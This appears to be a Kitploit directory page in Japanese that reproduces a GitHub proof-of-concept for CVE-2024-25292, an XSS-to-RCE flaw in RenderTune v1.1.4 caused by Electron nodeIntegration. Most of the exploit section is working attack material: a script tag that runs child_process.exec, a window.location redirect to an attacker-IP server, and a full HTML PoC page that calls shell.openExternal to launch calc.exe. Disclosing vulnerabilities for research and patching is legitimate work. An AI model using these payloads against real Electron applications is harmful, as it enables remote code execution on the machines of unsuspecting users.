Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25292 — RenderTune v1.1.4 における XSS to RCE エクスプロイト | Kitploit
ツール/GitHubGitHub/eqstlab/cve-2024-25292
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

RenderTune v1.1.4 における XSS to RCE エクスプロイト

リポジトリを見る
2111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RenderTune RCE

CVE-2024-25292 脆弱性の Proof-of-Concept です。

RenderTune v1.1.4 のクロスサイトスクリプティング(XSS)脆弱性により、攻撃者は Upload Title パラメータに仕込んだ巧妙なペイロードを介して、任意の Web スクリプトまたは HTML を実行できます。 このリポジトリには、脆弱なサンプルアプリケーションと、その Proof-of-Concept(POC)エクスプロイトが含まれています。

PoC として、プロセスを自動化する Python ファイルがあります。

1. 脆弱性の概要:

XSS を介して RCE を可能にする脆弱性です。 タイトルに XSS が発生可能な部分があり、XSS の構文を介して NodeJS の構文を通じて RCE を可能にする脆弱性です。


2. 脆弱性の原因:

  • nteract 0.28.0 は、Markdown リンクを介した Electron webview を許可し、その結果、リモートコード実行が可能になります(webPreferences の nodeIntegration が true のため)。
  • エクスプロイトの説明
    • アプリケーション内で MarkDown を介してリンクを生成すると、Electron を介して WebView が作成され、リンクへの外部アクセスが可能になります。その結果、攻撃者は攻撃者のサーバーに誘導するリンクに接続させることで、リモートコード実行(RCE)を達成できます。

Proof-of-concept(POC)

ケース 1) XSS から RCE へ。

ステップ 1) タイトル部分で XSS が発生することを確認します ※ このとき、画像が添付されていないと Upload 項目は登録されません

root@kitploit:~
<b>jruru</b>

1

ステップ 2) したがって、XSS を使用して NodeJS のシステムコマンドを実行するように構成します。

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

ケース 2) 攻撃者サーバーを介した攻撃

※ window.location を使用して攻撃を試みると、アプリを実行するたびに設定したページに自動的に移動します。

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

注意: ※ すばやくテストしたい場合は、攻撃者の PC で次のコードを使用してサーバーを作成します。

root@kitploit:~
$ python -m http.server 80
  • PoC コード
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


ツールをダウンロード